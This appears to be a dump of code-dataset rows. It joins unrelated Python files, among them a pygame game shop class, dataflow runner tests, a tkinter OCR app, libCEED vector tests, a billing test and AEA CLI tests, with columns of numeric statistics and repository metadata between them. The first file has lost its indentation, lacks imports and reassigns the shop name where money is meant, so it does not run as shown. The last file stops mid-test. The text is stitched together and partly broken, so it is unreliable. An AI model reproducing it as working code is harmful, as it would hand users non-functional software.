from copy import copy
from random import randint, choice
import string
from lib.transactionButton import TransactionButton
SHOP_PREFIX = ["archer", "baker", "fisher", "miller", "rancher", "robber"]
SHOP_SUFFIX = ["cave", "creek", "desert", "farm", "field", "forest", "hill", "lake", "mountain", "pass", "valley", "woods"]
class Shop():
def __init__(self, name, inventory, priceModifier, groupInventory, groupMoney, itemPrices, position, blitPosition, money, resourcePath):
self.yValue = 40
self.groupInventory = groupInventory
self.groupMoney = groupMoney
self.priceModifier = priceModifier
self.itemPrices = itemPrices
self.inventory = inventory
self.position = position
self.blitPosition = blitPosition
self.resourcePath = resourcePath
self.buyButtonList = []
self.sellButtonList = []
self.xPos = (-self.position * 40) + 1280
self.shopSurface = Surface((500, 300)).convert()
self.sepLine = Surface((self.shopSurface.get_width(), 10)).convert()
self.sepLine.fill((0, 0, 0))
self.invContainer = Surface((self.shopSurface.get_width() - 20,
self.shopSurface.get_height() / 2 - 35)).convert()
self.invContainer.fill((255, 255, 255))
self.titleFont = font.Font("res/fonts/west.ttf", 17)
self.textFont = font.Font("res/fonts/west.ttf", 15)
if (name == ""):
self.name = (choice(SHOP_PREFIX) + "'s " + choice(SHOP_SUFFIX)).capitalize()
else:
self.name = name
if (self.inventory == {}):
inventoryRandom = copy(self.groupInventory)
for key in list(inventoryRandom.keys()):
inventoryRandom[key] = randint(0, 10)
inventoryRandom["Food"] *= 20
self.inventory = inventoryRandom
if (money is None):
self.money = randint(200, 500)
else:
self.name = name
self.render()
def get_surface(self):
self.render()
return self.shopSurface
def update(self, groupInv, groupMoney):
self.groupInventory = groupInv
self.groupMoney = groupMoney
self.render()
def move(self, moveValue):
self.xPos += (2 * moveValue)
self.render()
def render(self):
self.yValue = 40
self.shopSurface.fill((133, 94, 66))
self.shopSurface.blit(self.titleFont.render(self.name + " - $" + str(self.money), 1, (0, 0, 255)), (10, 5))
self.shopSurface.blit(self.invContainer, (10, 25))
self.shopSurface.blit(self.invContainer, (10, self.shopSurface.get_height() / 2 + 30))
self.shopSurface.blit(self.textFont.render("Inventory", 1, (255, 0, 0)), (10, 25))
self.shopSurface.blit(self.textFont.render("Amount", 1, (255, 0, 0)), (130, 25))
self.shopSurface.blit(self.textFont.render("Price", 1, (255, 0, 0)), (200, 25))
for key in list(self.inventory.keys()):
self.shopSurface.blit(self.textFont.render(key + ":", 1, (0, 0, 0)), (10, self.yValue))
self.shopSurface.blit(self.textFont.render(str(self.inventory[key]), 1,
(0, 0, 0)), (150, self.yValue))
self.shopSurface.blit(self.textFont.render("$"+str(self.itemPrices[key] * self.priceModifier), 1,
(0, 0, 0)), (200, self.yValue))
if (len(self.buyButtonList) < len(self.inventory.keys())):
buttonPos = tuple(map(sum, zip(self.blitPosition, (250, self.yValue))))
self.buyButtonList.append(TransactionButton(transaction = "buy",
item = key,
imagePosition = (250, self.yValue),
rectPosition = buttonPos,
resourcePath = self.resourcePath))
self.yValue += 30
for button in self.buyButtonList:
self.shopSurface.blit(button.image, button.imagePosition)
self.shopSurface.blit(self.sepLine, (0, float(self.shopSurface.get_height()) / 2))
self.shopSurface.blit(self.titleFont.render("You - $" + str(self.groupMoney), 1, (0, 0, 255)),
(10, float(self.shopSurface.get_height()) / 2 + 10))
self.shopSurface.blit(self.titleFont.render("Inventory", 1, (255, 0, 0)),
(10, float(self.shopSurface.get_height()) / 2 + 30))
self.shopSurface.blit(self.titleFont.render("Amount", 1, (255, 0, 0)),
(130, float(self.shopSurface.get_height()) / 2 + 30))
self.shopSurface.blit(self.titleFont.render("Price", 1, (255, 0, 0)),
(200, float(self.shopSurface.get_height()) / 2 + 30))
self.yValue = (float(self.shopSurface.get_height()) / 2) + 45
for key in list(self.groupInventory.keys()):
self.shopSurface.blit(self.textFont.render(key + ":", 1, (0, 0, 0)), (10, self.yValue))
self.shopSurface.blit(self.textFont.render(str(self.groupInventory[key]), 1,
(0, 0, 0)), (150, self.yValue))
self.shopSurface.blit(self.textFont.render("$" + str(self.itemPrices[key] * self.priceModifier), 1,
(0, 0, 0)), (200, self.yValue))
if (len(self.sellButtonList) < len(self.inventory.keys())):
buttonPos = tuple(map(sum, zip(self.blitPosition, (250, self.yValue))))
self.sellButtonList.append(TransactionButton(transaction = "sell",
item = key,
imagePosition = (250, self.yValue),
rectPosition = buttonPos,
resourcePath = self.resourcePath))
self.yValue += 30
for button in self.sellButtonList:
self.shopSurface.blit(button.image, button.imagePosition)
| 41.480315
| 137
| 0.650721
| 643
| 5,268
| 5.301711
| 0.200622
| 0.140804
| 0.105896
| 0.114696
| 0.523614
| 0.485186
| 0.397771
| 0.306248
| 0.295688
| 0.295688
| 0
| 0.050152
| 0.186219
| 5,268
| 127
| 138
| 41.480315
| 0.745043
| 0
| 0
| 0.32381
| 0
| 0
| 0.038337
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0.009524
| 0.047619
| 0
| 0.114286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60fb27a39e6c08f8aae7d5554b69bcd58cf5b1d9
| 2,047
|
py
|
Python
|
core/dataflow/test/test_runners.py
|
ajmal017/amp
|
8de7e3b88be87605ec3bad03c139ac64eb460e5c
|
[
"BSD-3-Clause"
] | null | null | null |
core/dataflow/test/test_runners.py
|
ajmal017/amp
|
8de7e3b88be87605ec3bad03c139ac64eb460e5c
|
[
"BSD-3-Clause"
] | null | null | null |
core/dataflow/test/test_runners.py
|
ajmal017/amp
|
8de7e3b88be87605ec3bad03c139ac64eb460e5c
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
import numpy as np
import core.dataflow as dtf
import helpers.unit_test as hut
_LOG = logging.getLogger(__name__)
class TestRollingFitPredictDagRunner(hut.TestCase):
def test1(self) -> None:
"""
Test the DagRunner using `ArmaReturnsBuilder`
"""
dag_builder = dtf.ArmaReturnsBuilder()
config = dag_builder.get_config_template()
dag_builder.get_dag(config)
#
dag_runner = dtf.RollingFitPredictDagRunner(
config=config,
dag_builder=dag_builder,
start="2010-01-04 09:30",
end="2010-01-04 15:30",
retraining_freq="H",
retraining_lookback=4,
)
result_bundles = list(dag_runner.fit_predict())
np.testing.assert_equal(len(result_bundles), 2)
class TestIncrementalDagRunner(hut.TestCase):
def test1(self) -> None:
"""
Test the DagRunner using `ArmaReturnsBuilder`
"""
dag_builder = dtf.ArmaReturnsBuilder()
config = dag_builder.get_config_template()
# Create DAG and generate fit state.
dag = dag_builder.get_dag(config)
dag.run_leq_node("rets/clip", "fit")
fit_state = dtf.get_fit_state(dag)
#
dag_runner = dtf.IncrementalDagRunner(
config=config,
dag_builder=dag_builder,
start="2010-01-04 15:30",
end="2010-01-04 15:45",
freq="5T",
fit_state=fit_state,
)
result_bundles = list(dag_runner.predict())
self.assertEqual(len(result_bundles), 4)
# Check that dataframe results of `col` do not retroactively change
# over successive prediction steps (which would suggest future
# peeking).
col = "vwap_ret_0_vol_2_hat"
for rb_i, rb_i_next in zip(result_bundles[:-1], result_bundles[1:]):
srs_i = rb_i.result_df[col]
srs_i_next = rb_i_next.result_df[col]
self.assertTrue(srs_i.compare(srs_i_next[:-1]).empty)
| 31.984375
| 76
| 0.616512
| 247
| 2,047
| 4.8583
| 0.42915
| 0.083333
| 0.053333
| 0.025
| 0.405
| 0.358333
| 0.291667
| 0.291667
| 0.291667
| 0.291667
| 0
| 0.040273
| 0.284319
| 2,047
| 63
| 77
| 32.492063
| 0.77884
| 0.128969
| 0
| 0.238095
| 0
| 0
| 0.057192
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60fb78d100400013bb9e1879a2d59065d01b4f6b
| 4,478
|
py
|
Python
|
Main Project/Main_Program.py
|
hmnk-1967/OCR-Python-Project-CS-BUIC
|
28c72d9913a25655f6183a7b960e527a0432c8e1
|
[
"MIT"
] | null | null | null |
Main Project/Main_Program.py
|
hmnk-1967/OCR-Python-Project-CS-BUIC
|
28c72d9913a25655f6183a7b960e527a0432c8e1
|
[
"MIT"
] | null | null | null |
Main Project/Main_Program.py
|
hmnk-1967/OCR-Python-Project-CS-BUIC
|
28c72d9913a25655f6183a7b960e527a0432c8e1
|
[
"MIT"
] | null | null | null |
import tkinter.messagebox
from tkinter import *
import tkinter as tk
from tkinter import filedialog
import numpy
import pytesseract #Python wrapper for Google-owned OCR engine known by the name of Tesseract.
import cv2
from PIL import Image, ImageTk
import os
root = tk.Tk()
root.title("Object Character Recognizer")
root.geometry("1280x720")
test_image = None
def browse_image():
fin = filedialog.askopenfilename(initialdir=os.getcwd(), title="Select Image File", filetypes=(("PNG Files", "*.png"), ("JPG Files", "*.jpg"), ("All Files", "*.*")))
global test_image
image = Image.open(fin)
test_image = image
img = ImageTk.PhotoImage(image.resize((650, 400)))
lb = tk.Label(image=img)
lb.place(x=25, y=50)
root.mainloop()
def use_ocr_default():
try:
global test_image
messge = None
#OEM stands for OCR Engine Mode and PSM stands for Page Segmentation Mode.
#OEM defines what kind of OCR engine is to be used (this defines the dataset that would be used to cross-match
#the available data with the testing data).
#PSM defines how Tesseract will treat the image that supposedly contains characters and how it will extract the
#data from the image.
tess = pytesseract.image_to_string(test_image, config='-l eng --oem 1 --psm 3')
label = Label(messge, text='Result:')
label.place(x=850, y=320)
display_message = Text(messge, width=46, height=15)
display_message.insert(END, str(tess))
display_message.config(state=DISABLED)
display_message.delete(0, END)
display_message.place(x=890, y=330)
except: #Print a error message when the user inputs an incompatible image.
tkinter.messagebox.showinfo('Something\'s Wrong!', 'Your picture may not contain English characters or you may have not selected a picture. Please select a picture with detectable English characters.')
def use_ocr_handwriting():
try:
global test_image
opencv_img = numpy.array(test_image)
opencv_img = opencv_img[:, :, ::-1].copy() #This line is used to convert RGB PIL image file to BGR cv2 image file.
blurred_img = cv2.medianBlur(opencv_img, 5)
gray_img = cv2.cvtColor(blurred_img, cv2.COLOR_BGR2GRAY)
thresh, binary = cv2.threshold(gray_img, 122, 255, cv2.THRESH_BINARY)
messge = None
tess = pytesseract.image_to_string(binary, config='-l eng --oem 1 --psm 3')
label = Label(messge, text='Result:')
label.place(x=850, y=320)
display_message = Text(messge, width=46, height=15)
display_message.insert(END, str(tess))
display_message.config(state=DISABLED)
display_message.delete(0, END)
display_message.place(x=890, y=330)
except:
tkinter.messagebox.showinfo('Something\'s Wrong!', 'Your picture may not contain English characters or you may have not selected a picture. Please select a picture with detectable English characters.')
def use_ocr_singletext():
try:
global test_image
messge = None
tess = pytesseract.image_to_string(test_image, config='-l eng --oem 1 --psm 7')
label = Label(messge, text='Result:')
label.place(x=850, y=320)
display_message = Text(messge, width=46, height=15)
display_message.insert(END, str(tess))
display_message.config(state=DISABLED)
display_message.delete(0, END)
display_message.place(x=890, y=330)
except:
tkinter.messagebox.showinfo('Something\'s Wrong!', 'Your picture may not contain English characters or you may have not selected a picture. Please select a picture with detectable English characters.')
w = tk.LabelFrame(root, text="Image:", width=768, height=600)
w.place(x=20, y=10)
w.pack_propagate(0)
w1 = tk.LabelFrame(root, text="Extracted Text:", width=500, height=310)
w1.place(x=800, y=300)
w2 = tk.LabelFrame(root, text="Operations:", width=350, height=280)
w2.place(x=800, y=10)
btn1 = tk.Button(w2, text="Load Image", padx=40, pady=10, command=browse_image)
btn1.place(x=22, y=20)
btn1 = tk.Button(w2, text="Run Handwritten OCR", padx=40, pady=10, command=use_ocr_handwriting)
btn1.place(x=22, y=80)
btn1 = tk.Button(w2, text="Run Default OCR", padx=40, pady=10, command=use_ocr_default)
btn1.place(x=22, y=140)
btn1 = tk.Button(w2, text="Run Single Text OCR", padx=40, pady=10, command=use_ocr_singletext)
btn1.place(x=22, y=200)
root.mainloop()
| 44.336634
| 209
| 0.692497
| 664
| 4,478
| 4.587349
| 0.308735
| 0.068943
| 0.019698
| 0.018385
| 0.516415
| 0.487196
| 0.451412
| 0.435653
| 0.408076
| 0.408076
| 0
| 0.048106
| 0.192273
| 4,478
| 100
| 210
| 44.78
| 0.794028
| 0.125726
| 0
| 0.458824
| 0
| 0.011765
| 0.079345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047059
| false
| 0
| 0.105882
| 0
| 0.152941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60fc4c563a78f035d637363b6ec3e80079aa3d28
| 10,095
|
py
|
Python
|
python/tests/test-1-vector.py
|
wence-/libCEED
|
c785ad36304ed34c5edefb75cf1a0fe5445db17b
|
[
"BSD-2-Clause"
] | null | null | null |
python/tests/test-1-vector.py
|
wence-/libCEED
|
c785ad36304ed34c5edefb75cf1a0fe5445db17b
|
[
"BSD-2-Clause"
] | null | null | null |
python/tests/test-1-vector.py
|
wence-/libCEED
|
c785ad36304ed34c5edefb75cf1a0fe5445db17b
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2017, Lawrence Livermore National Security, LLC. Produced at
# the Lawrence Livermore National Laboratory. LLNL-CODE-734707. All Rights
# reserved. See files LICENSE and NOTICE for details.
#
# This file is part of CEED, a collection of benchmarks, miniapps, software
# libraries and APIs for efficient high-order finite element and spectral
# element discretizations for exascale applications. For more information and
# source code availability see http://github.com/ceed.
#
# The CEED research is supported by the Exascale Computing Project 17-SC-20-SC,
# a collaborative effort of two U.S. Department of Energy organizations (Office
# of Science and the National Nuclear Security Administration) responsible for
# the planning and preparation of a capable exascale ecosystem, including
# software, applications, hardware, advanced system engineering and early
# testbed platforms, in support of the nation's exascale computing imperative.
# @file
# Test Ceed Vector functionality
import os
import libceed
import numpy as np
import check
TOL = libceed.EPSILON * 256
# -------------------------------------------------------------------------------
# Utility
# -------------------------------------------------------------------------------
def check_values(ceed, x, value):
with x.array_read() as b:
for i in range(len(b)):
assert b[i] == value
# -------------------------------------------------------------------------------
# Test creation, setting, reading, restoring, and destroying of a vector
# -------------------------------------------------------------------------------
def test_100(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
with x.array_read() as b:
for i in range(n):
assert b[i] == 10 + i
# -------------------------------------------------------------------------------
# Test setValue
# -------------------------------------------------------------------------------
def test_101(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
value = 1
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
with x.array() as b:
for i in range(len(b)):
assert b[i] == 10 + i
x.set_value(3.0)
check_values(ceed, x, 3.0)
del x
x = ceed.Vector(n)
# Set value before setting or getting the array
x.set_value(5.0)
check_values(ceed, x, 5.0)
# -------------------------------------------------------------------------------
# Test getArrayRead state counter
# -------------------------------------------------------------------------------
def test_102(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
x.set_value(0)
# Two read accesses should not generate an error
a = x.get_array_read()
b = x.get_array_read()
x.restore_array_read()
x.restore_array_read()
# -------------------------------------------------------------------------------
# Test setting one vector from array of another vector
# -------------------------------------------------------------------------------
def test_103(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
y = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
with x.array() as x_array:
y.set_array(x_array, cmode=libceed.USE_POINTER)
with y.array_read() as y_array:
for i in range(n):
assert y_array[i] == 10 + i
# -------------------------------------------------------------------------------
# Test getArray to modify array
# -------------------------------------------------------------------------------
def test_104(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.zeros(n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
with x.array() as b:
b[3] = -3.14
if libceed.lib.CEED_SCALAR_TYPE == libceed.SCALAR_FP32:
assert a[3] == np.float32(-3.14)
else:
assert a[3] == -3.14
# -------------------------------------------------------------------------------
# Test creation, setting, reading, restoring, and destroying of a vector using
# CEED_MEM_DEVICE
# -------------------------------------------------------------------------------
def test_105(ceed_resource):
# Skip test for non-GPU backend
if 'gpu' in ceed_resource:
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
y = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
arr = x.get_array_read(memtype=libceed.MEM_DEVICE)
y.set_array(arr, memtype=libceed.MEM_DEVICE)
x.restore_array_read()
with y.array_read() as b:
for i in range(n):
assert b[i] == 10 + i
# -------------------------------------------------------------------------------
# Test view
# -------------------------------------------------------------------------------
def test_107(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
print(x)
stdout, stderr, ref_stdout = check.output(capsys)
assert not stderr
assert stdout == ref_stdout
# -------------------------------------------------------------------------------
# Test norms
# -------------------------------------------------------------------------------
def test_108(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(0, n, dtype=ceed.scalar_type())
for i in range(n):
if (i % 2 == 0):
a[i] *= -1
x.set_array(a, cmode=libceed.USE_POINTER)
norm = x.norm(normtype=libceed.NORM_1)
assert abs(norm - 45.) < TOL
norm = x.norm()
assert abs(norm - np.sqrt(285.)) < TOL
norm = x.norm(normtype=libceed.NORM_MAX)
assert abs(norm - 9.) < TOL
# -------------------------------------------------------------------------------
# Test taking the reciprocal of a vector
# -------------------------------------------------------------------------------
def test_119(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.USE_POINTER)
x.reciprocal()
with x.array_read() as b:
for i in range(n):
assert abs(b[i] - 1. / (10 + i)) < TOL
# -------------------------------------------------------------------------------
# Test AXPY
# -------------------------------------------------------------------------------
def test_121(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
y = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.COPY_VALUES)
y.set_array(a, cmode=libceed.COPY_VALUES)
y.axpy(-0.5, x)
with y.array() as b:
assert np.allclose(.5 * a, b)
# -------------------------------------------------------------------------------
# Test pointwise multiplication
# -------------------------------------------------------------------------------
def test_122(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
w = ceed.Vector(n)
x = ceed.Vector(n)
y = ceed.Vector(n)
a = np.arange(0, n, dtype=ceed.scalar_type())
w.set_array(a, cmode=libceed.COPY_VALUES)
x.set_array(a, cmode=libceed.COPY_VALUES)
y.set_array(a, cmode=libceed.COPY_VALUES)
w.pointwise_mult(x, y)
with w.array() as b:
for i in range(len(b)):
assert abs(b[i] - i * i) < 1e-14
w.pointwise_mult(w, y)
with w.array() as b:
for i in range(len(b)):
assert abs(b[i] - i * i * i) < 1e-14
w.pointwise_mult(x, w)
with w.array() as b:
for i in range(len(b)):
assert abs(b[i] - i * i * i * i) < 1e-14
y.pointwise_mult(y, y)
with y.array() as b:
for i in range(len(b)):
assert abs(b[i] - i * i) < 1e-14
# -------------------------------------------------------------------------------
# Test Scale
# -------------------------------------------------------------------------------
def test_123(ceed_resource, capsys):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
a = np.arange(10, 10 + n, dtype=ceed.scalar_type())
x.set_array(a, cmode=libceed.COPY_VALUES)
x.scale(-0.5)
with x.array() as b:
assert np.allclose(-.5 * a, b)
# -------------------------------------------------------------------------------
# Test getArrayWrite to modify array
# -------------------------------------------------------------------------------
def test_124(ceed_resource):
ceed = libceed.Ceed(ceed_resource)
n = 10
x = ceed.Vector(n)
with x.array_write() as a:
for i in range(len(a)):
a[i] = 3 * i
with x.array_read() as a:
for i in range(len(a)):
assert a[i] == 3 * i
# -------------------------------------------------------------------------------
# Test modification of reshaped array
# -------------------------------------------------------------------------------
def test_199(ceed_resource):
"""Modification of reshaped array"""
ceed = libceed.Ceed(ceed_resource)
vec = ceed.Vector(12)
vec.set_value(0.0)
with vec.array(4, 3) as x:
x[...] = np.eye(4, 3)
with vec.array_read(3, 4) as x:
assert np.all(x == np.eye(4, 3).reshape(3, 4))
# -------------------------------------------------------------------------------
| 28.597734
| 81
| 0.470134
| 1,210
| 10,095
| 3.81405
| 0.187603
| 0.075406
| 0.045287
| 0.057638
| 0.554496
| 0.505309
| 0.478873
| 0.478873
| 0.450054
| 0.450054
| 0
| 0.02457
| 0.19366
| 10,095
| 352
| 82
| 28.678977
| 0.542383
| 0.404656
| 0
| 0.555556
| 0
| 0
| 0.000505
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 1
| 0.083333
| false
| 0
| 0.022222
| 0
| 0.105556
| 0.005556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ff05c6f96bea8d8b81dd6255359543dc3d93ad
| 1,562
|
py
|
Python
|
src/waldur_mastermind/billing/tests/test_price_current.py
|
opennode/nodeconductor-assembly-waldur
|
cad9966389dc9b52b13d2301940c99cf4b243900
|
[
"MIT"
] | 2
|
2017-01-20T15:26:25.000Z
|
2017-08-03T04:38:08.000Z
|
src/waldur_mastermind/billing/tests/test_price_current.py
|
opennode/nodeconductor-assembly-waldur
|
cad9966389dc9b52b13d2301940c99cf4b243900
|
[
"MIT"
] | null | null | null |
src/waldur_mastermind/billing/tests/test_price_current.py
|
opennode/nodeconductor-assembly-waldur
|
cad9966389dc9b52b13d2301940c99cf4b243900
|
[
"MIT"
] | null | null | null |
from freezegun import freeze_time
from rest_framework import test
from waldur_mastermind.billing.tests.utils import get_financial_report_url
from waldur_mastermind.invoices import models as invoice_models
from waldur_mastermind.invoices.tests import factories as invoice_factories
from waldur_mastermind.invoices.tests import fixtures as invoice_fixtures
@freeze_time('2017-01-10')
class PriceCurrentTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = invoice_fixtures.InvoiceFixture()
invoice_factories.InvoiceItemFactory(
invoice=self.fixture.invoice,
project=self.fixture.project,
unit=invoice_models.InvoiceItem.Units.PER_MONTH,
unit_price=100,
quantity=1,
)
invoice_factories.InvoiceItemFactory(
invoice=self.fixture.invoice,
project=self.fixture.project,
unit=invoice_models.InvoiceItem.Units.PER_DAY,
unit_price=3,
quantity=31,
)
def test_current_price(self):
self.client.force_authenticate(self.fixture.staff)
url = get_financial_report_url(self.fixture.project.customer)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
data = response.json()
self.assertEqual(data['billing_price_estimate']['current'], 100 + 9 * 3)
diff = (
data['billing_price_estimate']['total']
- data['billing_price_estimate']['current']
)
self.assertEqual(diff, 22 * 3)
| 37.190476
| 80
| 0.68822
| 174
| 1,562
| 5.977011
| 0.37931
| 0.074038
| 0.076923
| 0.080769
| 0.365385
| 0.305769
| 0.230769
| 0.230769
| 0.230769
| 0.230769
| 0
| 0.021488
| 0.225352
| 1,562
| 41
| 81
| 38.097561
| 0.838017
| 0
| 0
| 0.166667
| 0
| 0
| 0.060819
| 0.042254
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.055556
| false
| 0
| 0.166667
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ff33dc263000945ad4491d74e8e10a35657808
| 16,741
|
py
|
Python
|
tests/test_cli/test_utils/test_utils.py
|
ejfitzgerald/agents-aea
|
6411fcba8af2cdf55a3005939ae8129df92e8c3e
|
[
"Apache-2.0"
] | null | null | null |
tests/test_cli/test_utils/test_utils.py
|
ejfitzgerald/agents-aea
|
6411fcba8af2cdf55a3005939ae8129df92e8c3e
|
[
"Apache-2.0"
] | null | null | null |
tests/test_cli/test_utils/test_utils.py
|
ejfitzgerald/agents-aea
|
6411fcba8af2cdf55a3005939ae8129df92e8c3e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This test module contains the tests for aea.cli.utils module."""
from builtins import FileNotFoundError
from typing import cast
from unittest import TestCase, mock
from click import BadParameter, ClickException
from jsonschema import ValidationError
from yaml import YAMLError
from aea.cli.utils.click_utils import AEAJsonPathType, PublicIdParameter
from aea.cli.utils.config import (
_init_cli_config,
get_or_create_cli_config,
update_cli_config,
)
from aea.cli.utils.context import Context
from aea.cli.utils.decorators import _validate_config_consistency, clean_after
from aea.cli.utils.formatting import format_items
from aea.cli.utils.generic import is_readme_present
from aea.cli.utils.package_utils import (
find_item_in_distribution,
find_item_locally,
is_fingerprint_correct,
try_get_balance,
try_get_item_source_path,
try_get_item_target_path,
validate_author_name,
validate_package_name,
)
from tests.conftest import FETCHAI
from tests.test_cli.tools_for_testing import (
ConfigLoaderMock,
ContextMock,
PublicIdMock,
StopTest,
raise_stoptest,
)
AUTHOR = "author"
class FormatItemsTestCase(TestCase):
"""Test case for format_items method."""
def testformat_items_positive(self):
"""Test format_items positive result."""
items = [
{
"public_id": "author/name:version",
"name": "obj-name",
"description": "Some description",
"author": "author",
"version": "1.0",
}
]
result = format_items(items)
expected_result = (
"------------------------------\n"
"Public ID: author/name:version\n"
"Name: obj-name\n"
"Description: Some description\n"
"Author: author\n"
"Version: 1.0\n"
"------------------------------\n"
)
self.assertEqual(result, expected_result)
@mock.patch("aea.cli.utils.package_utils.os.path.join", return_value="some-path")
class TryGetItemSourcePathTestCase(TestCase):
"""Test case for try_get_item_source_path method."""
@mock.patch("aea.cli.utils.package_utils.os.path.exists", return_value=True)
def test_get_item_source_path_positive(self, exists_mock, join_mock):
"""Test for get_item_source_path positive result."""
result = try_get_item_source_path("cwd", AUTHOR, "skills", "skill-name")
expected_result = "some-path"
self.assertEqual(result, expected_result)
join_mock.assert_called_once_with("cwd", AUTHOR, "skills", "skill-name")
exists_mock.assert_called_once_with("some-path")
result = try_get_item_source_path("cwd", None, "skills", "skill-name")
self.assertEqual(result, expected_result)
@mock.patch("aea.cli.utils.package_utils.os.path.exists", return_value=False)
def test_get_item_source_path_not_exists(self, exists_mock, join_mock):
"""Test for get_item_source_path item already exists."""
with self.assertRaises(ClickException):
try_get_item_source_path("cwd", AUTHOR, "skills", "skill-name")
@mock.patch("aea.cli.utils.package_utils.os.path.join", return_value="some-path")
class TryGetItemTargetPathTestCase(TestCase):
"""Test case for try_get_item_target_path method."""
@mock.patch("aea.cli.utils.package_utils.os.path.exists", return_value=False)
def test_get_item_target_path_positive(self, exists_mock, join_mock):
"""Test for get_item_source_path positive result."""
result = try_get_item_target_path("packages", AUTHOR, "skills", "skill-name")
expected_result = "some-path"
self.assertEqual(result, expected_result)
join_mock.assert_called_once_with("packages", AUTHOR, "skills", "skill-name")
exists_mock.assert_called_once_with("some-path")
@mock.patch("aea.cli.utils.package_utils.os.path.exists", return_value=True)
def test_get_item_target_path_already_exists(self, exists_mock, join_mock):
"""Test for get_item_target_path item already exists."""
with self.assertRaises(ClickException):
try_get_item_target_path("skills", AUTHOR, "skill-name", "packages_path")
class PublicIdParameterTestCase(TestCase):
"""Test case for PublicIdParameter class."""
def test_get_metavar_positive(self):
"""Test for get_metavar positive result."""
result = PublicIdParameter.get_metavar("obj", "param")
expected_result = "PUBLIC_ID"
self.assertEqual(result, expected_result)
@mock.patch("aea.cli.utils.config.os.path.dirname", return_value="dir-name")
@mock.patch("aea.cli.utils.config.os.path.exists", return_value=False)
@mock.patch("aea.cli.utils.config.os.makedirs")
@mock.patch("builtins.open")
class InitConfigFolderTestCase(TestCase):
"""Test case for _init_cli_config method."""
def test_init_cli_config_positive(
self, open_mock, makedirs_mock, exists_mock, dirname_mock
):
"""Test for _init_cli_config method positive result."""
_init_cli_config()
dirname_mock.assert_called_once()
